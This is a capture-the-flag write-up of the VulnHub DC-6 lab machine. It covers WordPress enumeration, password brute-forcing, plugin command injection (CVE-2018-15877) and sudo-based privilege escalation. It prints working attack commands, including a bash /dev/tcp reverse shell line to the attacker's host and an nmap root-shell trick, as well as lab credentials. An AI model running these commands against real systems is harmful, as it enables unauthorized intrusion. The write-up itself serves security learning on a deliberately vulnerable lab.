VulnHub: DC-6 Writeup

DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP Plugin which can be leveraged to gain a foothold on the system. A to-do note containing the user’s credentials is discovered while enumerating the home directory. For the root part, there is a sudo privileges on a writable backup script and nmap which allows me to escalate to other users then straight to root.

Reconnaissance

Host Discovery — arpscan

Because 192.168.2.1 and 192.168.2.2 are virtual gateway addresses, the target machine’s IP address is most likely 192.168.2.104.

arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
Arpscan

Nmap

With initial scan, nmap shows two ports open: SSH on port 22 and Apache Web Server on port 80.

nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
Nmap scan

From the results above, there’s a redirection to http://wordy/ on port 80. To properly resolve the web, I’ll add wordy to my /etc/hosts file.

echo '192.168.1.104   wordy' >> /etc/hosts

TCP 80 — Website

This page clearly states that it’s a WordPress site.

Wordy homepage

Nothing interesting to explore here, but the text secure plugins seems to be a hint from the machine’s author.

— :: Nmap NSE

Runningnmap script against this website finds several usernames.

nmap -p 80 --script "http-wordpress*" wordy
Nmap WordPress script

I’ll save those usernames into a file called users.

— :: WPScan

wpscan identifies two vulnerable WP plugins: an RCE and a user role privilege escalation.

wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
Wpscan

I’m interested with the RCE one, but before that I’ll have to find creds.

Brute-forcing passwords

At that time, I was stuck for a couple of hours. Asking for a nudge and the answer was to brute force, I didn’t know that the box’s author actually gave us a hint to create a custom wordlist from rokyou.txt.

Clue

I’ll create new wordlist from rockyou.txt and then use it to perform a brute force attack using wpscan.

wpscan --url http://wordy/ --usernames users --passwords passwords.txt
Brute-force

It returns one valid credentials: mark:helpdesk10.

Valid login

Foothold

Plainview Activity Monitor — RCE (CVE-2018–15877)

With the credentials I obtained, I can login into WP Dashboard.

WP Dashboard

From the previous wpscan, I searched the exploit PoC for Plainview Activity Monitor RCE and found this from exploit-db.

The exploit PoC exploits a vulnerability that comes from this IP tools feature.

IP Lookup

I’ll hit the lookup button and intercept the request on Burp.

RCE can be achieved by adding a set of malicious OS commands after the command pipe |, semi colon ; (stacked command), or logical OR || at the ip section. In this case, I send a reverse shell.

Reverse shell

Privilege Escalation

Internal enumeration

The home directory is readable by www-data and there are two interesting files: backups.sh and things-to-do.txt.

Interesting files

I immediately checked the contents of backups.sh and things-to-do.txt.

The backups.sh script is writable by group devs, and I’ll note that.

Contents of backups.sh

And this things-to-do.txt contains graham’s credentials.

Contents of things-do-do.txt

SSH — Graham

I tried the graham’s creds, graham:GSo7isUM1D4, on SSH, and it worked.

SSH graham

Shell as jens via sudo backups.sh

User graham has sudo privileges on the backups.sh script, and this allows me to run the script as user jens.

Sudo privileges on backups.sh

Because the script is also writable by graham (devs group), I can exploit this to escalate myself to jens by adding a reverse shell line to the script and then run it with sudo.

graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
Escalate to jens

Shell as root via sudo nmap

I found out that user jens is allowed to execute nmap as root user.

Sudo privileges on nmap

I can also exploit this using reference from GTFObins.

jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
Escalate to root

And here is the flag:

Root flag of DC-6

Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/

Always curious to learn how things work, especially in digital world